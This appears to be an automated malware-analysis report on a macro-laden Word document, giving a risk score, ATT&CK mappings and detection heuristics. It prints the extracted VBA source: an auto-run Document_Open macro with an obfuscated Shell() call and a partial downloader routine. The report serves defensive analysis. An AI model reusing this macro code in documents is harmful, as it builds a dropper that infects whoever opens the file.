MALICIOUS
260
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File: User Execution: Malicious Macro
T1071.001 Web Protocols: Web Protocols
T1105 Ingress Tool Transfer
The sample contains VBA macros that execute upon opening the document, specifically the Document_Open subroutine. This subroutine uses the Shell() function to execute a command, likely to download and run a second-stage payload. The obfuscated command string 'Àʼ¹ºÁ�‡|ºÆºnÀ³Ç¼ººˆ€ƒ²Áº�”¶Â¶ºšÆ¾Â' is a strong indicator of malicious intent. The presence of a fake prompt further supports a social engineering attack.
Heuristics 6
-
ClamAV: Doc.Trojan.Nutshell-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Nutshell-1
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMANDExtracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11439 bytes |
SHA-256: 5696491af878e5c815e7e5e742e733c437a5b836336c967bfbcdb23d55d7e1d4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
If Dir(d("±�ªÌ·Ã²ÄÅȪ̽Dzʾ¹ª | ")) = "" Then
If MsgBox(d("¢½·Èn»³¶ÂÊÀºn¾Áu±ÊÀdzÃÂÁÇu¼ÄÂu·ÃÁɯÁºº²ƒn¬½Êº¹nνÊnÁ·À³uÂÄn¾¼È¶ºÁn¾Âu¼ÄÅ”"), vbExclamation + vbYesNo) = vbYes Then
frmDownload.Show
Else
MsgBox d("§ÄÃu±¶¼Ã½ÉnË·ºÅu½·Èn¹½¸Ã³ÃÂuÃþºuÇÄÃu·ÃÁɯÁºu½·Èn»³¶ÂÊÀº|"), vbExclamation
End If
Else
Shell d("Àʼ¹ºÁ�‡|ºÆºnÀ³Ç¼ººˆ€ƒ²Áº�”¶Â¶ºšÆ¾Â")
Application.Quit wdDoNotSaveChanges
End If
End Sub
Attribute VB_Name = "frmDownload"
Attribute VB_Base = "0{E0DFDE4C-711C-4323-AD12-9356409718DB}{6E553441-0077-4D3E-99C2-901F3A524528}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function df(strURL As String, strDestination As String, _
Optional UserName As String = Empty, _
Optional Password As String = Empty) _
As Boolean
Const CHUNK_SIZE As Long = 1024
Const ROLLBACK As Long = 4096
On Error GoTo OhBoy
Dim bData() As Byte
Dim blnResume As Boolean
Dim intFile As Integer
Dim lngBytesReceived As Long
Dim lngFileLength As Long
Dim lngX
Dim lastTime As Single
Dim sglRate As Single
Dim sglTime As Single
Dim strFile As String
Dim strHeader As String
Dim strHost As String
With Inet1
.URL = strURL
.UserName = UserName
.Password = Password
.Execute , d("•š¢")
End With
While Inet1.StillExecuting
DoEvents
If CancelSearch Then GoTo ExitDownload
Wend
StatusLabel = "Saving:"
ToLabel = FitText(ToLabel, strDestination)
strHeader = Inet1.GetHeader
Select Case Mid(strHeader, 10, 3)
Case "200"
Case "206"
Case "204"
MsgBox "Nothing to download!", vbInformation, "No Content"
GoTo ExitDownload
Case "401"
MsgBox "Authorization failed!", vbCritical, "Unauthorized"
GoTo ExitDownload
Case "404"
MsgBox "The file was not found!", vbCritical, "File Not Found"
GoTo ExitDownload
Case vbCrLf
MsgBox "Cannot establish connection." & vbCr & vbCr & _
"Check your Internet connection and try again.", _
vbExclamation, _
"Cannot Establish Connection"
GoTo ExitDownload
Case Else
strHeader = Left(strHeader, InStr(strHeader, vbCr))
If strHeader = Empty Then strHeader = "<nothing>"
MsgBox "The server returned the following response:" & vbCr & vbCr & _
strHeader, _
vbCritical, _
"Error Downloading File"
GoTo ExitDownload
End Select
lastTime = Timer - 1
strHeader = Inet1.GetHeader("Content-Length")
lngFileLength = Val(strHeader)
If lngFileLength = 0 Then
GoTo ExitDownload
End If
With ProgressBar
.Value = 0
.Max = lngFileLength
End With
lngBytesReceived = 0
intFile = FreeFile()
Open strDestination For Binary Access Write As #intFile
If blnResume Then Seek #intFile, lngBytesReceived + 1
Do
bData = Inet1.GetChunk(CHUNK_SIZE, icByteArray)
Put #intFile, , bData
If CancelSearch Then Exit Do
lngBytesReceived = lngBytesReceived + UBound(bData, 1) + 1
sglRate = lngBytesReceived / (Timer - lastTime)
sglTime = (lngFileLength - lngBytesReceived) / sglRate
TimeLabel = FormatTime(sglTime) & _
" (" & _
FormatFileSize(lngBytesReceived) & _
" of " & _
FormatFileSize(lngFileLength) & _
" copied)"
RateLabel = FormatFileSize(sglRate, "###.0") & "/Sec"
ProgressBar.
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.